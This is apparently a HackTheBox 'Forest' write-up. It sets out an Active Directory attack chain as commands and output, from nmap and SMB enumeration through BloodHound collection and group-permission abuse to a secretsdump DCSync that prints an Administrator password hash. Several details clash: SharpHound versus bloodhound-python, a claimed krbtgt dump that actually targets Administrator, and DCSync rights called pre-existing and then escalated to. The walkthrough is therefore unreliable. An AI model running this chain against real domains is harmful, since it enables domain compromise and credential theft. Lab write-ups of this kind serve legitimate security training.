Table of Contents
Reconnaissance
Started with standard nmap scan to identify open ports and services. The target appeared to be a Windows Domain Controller.
nmap scan
$ nmap -sC -sV -p- 10.10.10.161 PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0
💡 Key Finding: Port 88 (Kerberos) and 389 (LDAP) confirm this is a Domain Controller.
SMB (445) is open for potential enumeration.
Initial Access
Enumerated SMB shares using smbclient and crackmapexec. Found readable shares containing potential credentials.
smb enumeration
$ crackmapexec smb 10.10.10.161 -u '' -p '' --shares SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 (name:FOREST) (domain:htb.local) SMB 10.10.10.161 445 FOREST [+] Enumerated shares SMB 10.10.10.161 445 FOREST Share Permissions Remark SMB 10.10.10.161 445 FOREST ----- ----------- ------ SMB 10.10.10.161 445 FOREST ADMIN$ Remote Admin SMB 10.10.10.161 445 FOREST C$ Default share SMB 10.10.10.161 445 FOREST IPC$ READ Remote IPC SMB 10.10.10.161 445 FOREST NETLOGON READ Logon server share SMB 10.10.10.161 445 FOREST SYSVOL READ Logon server share
Domain Enumeration
Used BloodHound to map the domain and identify attack paths. Collected data using SharpHound ingestor.
bloodhound collection
$ bloodhound-python -d htb.local -u svc-alfresco -p s3rvice -gc forest.htb.local -c all -ns 10.10.10.161 INFO: Found AD domain: htb.local INFO: Connecting to LDAP server: forest.htb.local INFO: Found 1 domains INFO: Found 2 domains in the forest INFO: Found 5 computers INFO: Found 20 users INFO: Found 52 groups INFO: Found 0 trusts INFO: Done in 00:00:15
⚠️ Critical Path Identified: BloodHound revealed that the user svc-alfresco
has DCSync rights to the domain, providing a direct path to Domain Admin.
Privilege Escalation
With the BloodHound data, identified that svc-alfresco is a member of the "Service Accounts" group, which has GenericAll permissions on the "Exchange Windows Permissions" group.
privilege escalation chain
# Add user to Exchange Windows Permissions group
$ net group "Exchange Windows Permissions" svc-alfresco /add /domain
# WriteDacl abuse to DCSync
$ python3 /opt/aclpwn.py -du svc-alfresco -dp s3rvice -t htb.local
Domain Admin Compromise
Performed DCSync attack to extract the krbtgt hash, creating a Golden Ticket for persistent access.
dcsync attack
$ secretsdump.py htb.local/svc-alfresco:s3rvice@10.10.10.161 -just-dc-user Administrator [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:154cb566bedd0220d0...
Root Flag Captured
HTB{4ct1v3_d1r3ct0ry_0wn3d}
Lessons Learned
This box demonstrated the importance of proper group nesting and permission auditing in Active Directory. The path from service account to Domain Admin through nested group memberships is a common misconfiguration in enterprise environments.